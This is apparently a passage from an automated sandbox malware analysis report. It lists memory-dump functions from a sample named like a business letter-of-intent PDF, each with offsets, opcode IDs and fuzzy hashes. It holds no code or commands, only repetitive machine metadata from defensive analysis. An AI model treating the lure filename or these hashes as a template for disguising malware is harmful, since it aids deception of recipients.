                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7214e729721c8699abef2d9afe77c619ec78b8dcb311baef55da5217ff83ab1c
                                                                                      • Instruction ID: b83813a135783e185cb590131c097094e6f07d1f49adc71806d1f0440ac26bd5
                                                                                      • Opcode Fuzzy Hash: 7214e729721c8699abef2d9afe77c619ec78b8dcb311baef55da5217ff83ab1c
                                                                                      • Instruction Fuzzy Hash: 91900435311400130107F55C5704507004747D5751355C433F3035511CD731CD755173
                                                                                      Function 32FD2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f763c57cff492e1d23dce3e7ae11a58d1b512e9e10a79a84b76e615385cd1453
                                                                                      • Instruction ID: 422ee2c7e1659a4767d4baf5629f4f7da0a06fd7c6b0bd8b75dfa0ebf948d267
                                                                                      • Opcode Fuzzy Hash: f763c57cff492e1d23dce3e7ae11a58d1b512e9e10a79a84b76e615385cd1453
                                                                                      • Instruction Fuzzy Hash: 299002A1201540A34501B258D504B0A450547E0601B55C417E2064521CC52589559176
                                                                                      Function 32FD2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 44b303ce578d0d845d2d3c93810a882360b217d59cc5ec1f38657d977a6c73ce
                                                                                      • Instruction ID: 708989d57e211a507c735c1500a46dfb64bd03bf0fd944a5f43c698f1abd0c4f
                                                                                      • Opcode Fuzzy Hash: 44b303ce578d0d845d2d3c93810a882360b217d59cc5ec1f38657d977a6c73ce
                                                                                      • Instruction Fuzzy Hash: 8990023120140813D1817158950464A000547D1701F95C416A1035615DCA158B5D77E2
                                                                                      Function 32FD2BE0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ef224438bfb71716a811257cda719f44a2ab3293c9c3fb581abd38196d022a1c
                                                                                      • Instruction ID: 8efcf9e9092b482ed3e48905985e22ad34ad788a6c6cfac54d153b217004a9be
                                                                                      • Opcode Fuzzy Hash: ef224438bfb71716a811257cda719f44a2ab3293c9c3fb581abd38196d022a1c
                                                                                      • Instruction Fuzzy Hash: 4890023120544853D14171589504A46001547D0705F55C412A1074655D96258E59B6A2
                                                                                      Function 32FD2BA0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3d3344b9ddbfc166a9458c8602226faf5e6d8b54e23e8ef22a95766963c4487
                                                                                      • Instruction ID: fdbb66bb10a8e0567dd1d132069fc4e74c6387d1a40504d8157d345157e1fde4
                                                                                      • Opcode Fuzzy Hash: a3d3344b9ddbfc166a9458c8602226faf5e6d8b54e23e8ef22a95766963c4487
                                                                                      • Instruction Fuzzy Hash: 3C90023160540813D15171589514746000547D0701F55C412A1034615D87558B5976E2
                                                                                      Function 32FD2B80 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cfb7eab31f4bec4ae576fd63cd6d5f609b6e7647af906de946bc4066058d2400
                                                                                      • Instruction ID: 4ab266622d64e4b3f2b4486466083d31f5df13e3a1df5aa42aa253d8051312b0
                                                                                      • Opcode Fuzzy Hash: cfb7eab31f4bec4ae576fd63cd6d5f609b6e7647af906de946bc4066058d2400
                                                                                      • Instruction Fuzzy Hash: 0B90023120140813D10571589904686000547D0701F55C412A7034616E966589957172
                                                                                      Function 32FD2B60 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 217417323c96eb3c11fc1fabdd2bdefd71e22031807be5ccfe6ef2232ddf3fca
                                                                                      • Instruction ID: f44082225cee5724682e3adea3f35263e01067cdc9361859bb47ba8ea177f7b2
                                                                                      • Opcode Fuzzy Hash: 217417323c96eb3c11fc1fabdd2bdefd71e22031807be5ccfe6ef2232ddf3fca
                                                                                      • Instruction Fuzzy Hash: 9890026120240013410671589514616400A47E0601B55C422E2024551DC52589956166
                                                                                      Function 32FD2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a1dffc424f964ce6593f9d84028acfe36d46aa37d8d13349471a139a4278991
                                                                                      • Instruction ID: fbd12b864859793a5ce915a37fdef310e8bbfed4c7c8ddb46e87eefaf0f27f75
                                                                                      • Opcode Fuzzy Hash: 2a1dffc424f964ce6593f9d84028acfe36d46aa37d8d13349471a139a4278991
                                                                                      • Instruction Fuzzy Hash: F790026120180413D14175589904607000547D0702F55C412A3074516E8A298D556176
                                                                                      Function 32FD2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6579dbeebc6caa7cf3c89fa27f0d6f2c97c653e437bf1eae81b73267cb599c90
                                                                                      • Instruction ID: 1b14f9d77f51f6697d11ee898a923628a6f4e92db11473d5f69bcd9bbdabafcd
                                                                                      • Opcode Fuzzy Hash: 6579dbeebc6caa7cf3c89fa27f0d6f2c97c653e437bf1eae81b73267cb599c90
                                                                                      • Instruction Fuzzy Hash: 1290027120140413D14171589504746000547D0701F55C412A6074515E86598ED966A6
                                                                                      Function 32FD2E80 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d780b0f7ac6fa7a5a67b88b32e85266bf2236bd7162850f092052c5b9b78e6ec
                                                                                      • Instruction ID: d3f6a33607694c44dd96e98ecee489cd354d738e61360747faaff2d9b65c1156
                                                                                      • Opcode Fuzzy Hash: d780b0f7ac6fa7a5a67b88b32e85266bf2236bd7162850f092052c5b9b78e6ec
                                                                                      • Instruction Fuzzy Hash: 1B90022160140513D10271589504616000A47D0641F95C423A2034516ECA258A96A172
                                                                                      Function 32FD2E30 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9fca51798cd6768312c4ecca5c890cd2b3f1f991f6df2ee17402f0670d26da6c
                                                                                      • Instruction ID: 1d5559b98bdcadb1ed7c74714e7251b459604a9dd9c390eb9a2d6f87c4f7ffdd
                                                                                      • Opcode Fuzzy Hash: 9fca51798cd6768312c4ecca5c890cd2b3f1f991f6df2ee17402f0670d26da6c
                                                                                      • Instruction Fuzzy Hash: AB90022130140413D10371589514606000987D1745F95C413E2434516D86258A57A173
                                                                                      Function 32FD2FE0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2d474a770d5ef22cc3032fe46b1198faba8784cdf9b0cc395176307a26f4114a
                                                                                      • Instruction ID: 974d7a5c744f9123d6c69d6b153f78503f62d67bc2f8eaab69a98992ba9d33a6
                                                                                      • Opcode Fuzzy Hash: 2d474a770d5ef22cc3032fe46b1198faba8784cdf9b0cc395176307a26f4114a
                                                                                      • Instruction Fuzzy Hash: 37900221211C0053D20175689D14B07000547D0703F55C516A1164515CC91589655562
                                                                                      Function 32FD2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ff1b47ebbd2ce4d0d4543ccab55817afe221c00fae978f158c5bf5f951a50515
                                                                                      • Instruction ID: c5fbdf1527af59b3a5c95d79df2ecf93af24749a15e37a10f77c40128c76341e
                                                                                      • Opcode Fuzzy Hash: ff1b47ebbd2ce4d0d4543ccab55817afe221c00fae978f158c5bf5f951a50515
                                                                                      • Instruction Fuzzy Hash: E39002216014005341417168D94490640056BE1611755C522A19A8511D8559896956A6
                                                                                      Function 32FD2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f402abbd786edc504d6800e22883e58b1370c9be044632ac0b4774ae33606a16
                                                                                      • Instruction ID: f81da214c43a8c7f71c2402b4bc9f275d25af6e858042878a82402de42dfb60e
                                                                                      • Opcode Fuzzy Hash: f402abbd786edc504d6800e22883e58b1370c9be044632ac0b4774ae33606a16
                                                                                      • Instruction Fuzzy Hash: 8B90023120180413D10171589908747000547D0702F55C412A6174516E8665C9956572
                                                                                      Function 32FD2F90 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60594155e7be4eab5e053795c51fdd8bc74de689a68e16fdd6538ace7c9bdc99
                                                                                      • Instruction ID: 73c5ab6b5d796fc9f06108052368b9a943e12fe062a180cd2cd535fb5f1cccbc
                                                                                      • Opcode Fuzzy Hash: 60594155e7be4eab5e053795c51fdd8bc74de689a68e16fdd6538ace7c9bdc99
                                                                                      • Instruction Fuzzy Hash: 7290023120180413D1017158991470B000547D0702F55C412A2174516D8625895565B2
                                                                                      Function 32FD2F60 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8a33432ca8aaab4ae9b815e90b25d91d1f0ff8c5a95b32486d5fcb41fa425d5d
                                                                                      • Instruction ID: 044ff05b7d25e0e7d59e608b6653aaae863cb2fb213d9de11216a05467989157
                                                                                      • Opcode Fuzzy Hash: 8a33432ca8aaab4ae9b815e90b25d91d1f0ff8c5a95b32486d5fcb41fa425d5d
                                                                                      • Instruction Fuzzy Hash: AE90047131140053D105715CD504707004547F1701F55C413F3174515CC53DCD755177
                                                                                      Function 32FD2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 87f1649603dbd2fbb05864b22ae623cc0c5356d6f8231eadf96aeabd348a4f37
                                                                                      • Instruction ID: 393b28ca1fed3b90a7ed8fc16909533969af2da8b8e487614bd482a10cbb6172
                                                                                      • Opcode Fuzzy Hash: 87f1649603dbd2fbb05864b22ae623cc0c5356d6f8231eadf96aeabd348a4f37
                                                                                      • Instruction Fuzzy Hash: 2590026134140453D10171589514B06000587E1701F55C416E2074515D8619CD566167
                                                                                      Function 32FD2CF0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a5a3ee001bb83284ff0dfa89982a97bbe7462bb928aa9bc7c2e61187e9bacedf
                                                                                      • Instruction ID: 4762e6c774a52767274747d339650b46a14fdaf7c02dc8d8ea034c787e7b2747
                                                                                      • Opcode Fuzzy Hash: a5a3ee001bb83284ff0dfa89982a97bbe7462bb928aa9bc7c2e61187e9bacedf
                                                                                      • Instruction Fuzzy Hash: 1590023120140413D1017158A608707000547D0601F55D812A1434519DD65689556162
                                                                                      Function 32FD2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3cd3ec8182cc208ca56f953d415492ab06059db1aa050c80573479ebbbdcc905
                                                                                      • Instruction ID: 345926e84944b245db68ea6ebbbe82ce763d7faca81b926ea322e83842355cff
                                                                                      • Opcode Fuzzy Hash: 3cd3ec8182cc208ca56f953d415492ab06059db1aa050c80573479ebbbdcc905
                                                                                      • Instruction Fuzzy Hash: B290022160540413D1417158A518706001547D0601F55D412A1034515DC6598B5966E2
                                                                                      Function 32FD2CA0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 620d48bfca2f6c991fbff7fb35dc707c90b0dd0e7ec141056745fbf7e6ccdf79
                                                                                      • Instruction ID: 010ddfa05099718b2cf9c250654ce512a44334d98c96af7c5b1acdfc616bc29a
                                                                                      • Opcode Fuzzy Hash: 620d48bfca2f6c991fbff7fb35dc707c90b0dd0e7ec141056745fbf7e6ccdf79
                                                                                      • Instruction Fuzzy Hash: B690023120140413D1017598A508646000547E0701F55D412A6034516EC66589956172
                                                                                      Function 32FD2C60 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e2c7576f7c2df7537479bda28a90bfc23bc16698cfe741f204dc9a2ded2c47dc
                                                                                      • Instruction ID: 413a6ee1bd06968bb50d6bf15b5eb5cc312e8d7a86113bf1dfe93676750e2771
                                                                                      • Opcode Fuzzy Hash: e2c7576f7c2df7537479bda28a90bfc23bc16698cfe741f204dc9a2ded2c47dc
                                                                                      • Instruction Fuzzy Hash: 8E90043130140C53D101715CD504F47000547F0701F55C417F1134715DC715CD557573
                                                                                      Function 32FD2DD0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b928e948f87fe553925e00aa39362890445bf57da53838412aaec91fffeb7ad
                                                                                      • Instruction ID: 7c228830ed5c57a52ec2a436764b9f03c5dd97661b38f5ff8ee43ff2d95b898e
                                                                                      • Opcode Fuzzy Hash: 5b928e948f87fe553925e00aa39362890445bf57da53838412aaec91fffeb7ad
                                                                                      • Instruction Fuzzy Hash: FD900221242441635546B1589504507400657E0641795C413A2424911C8526995AD662
                                                                                      Function 32FD2DB0 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
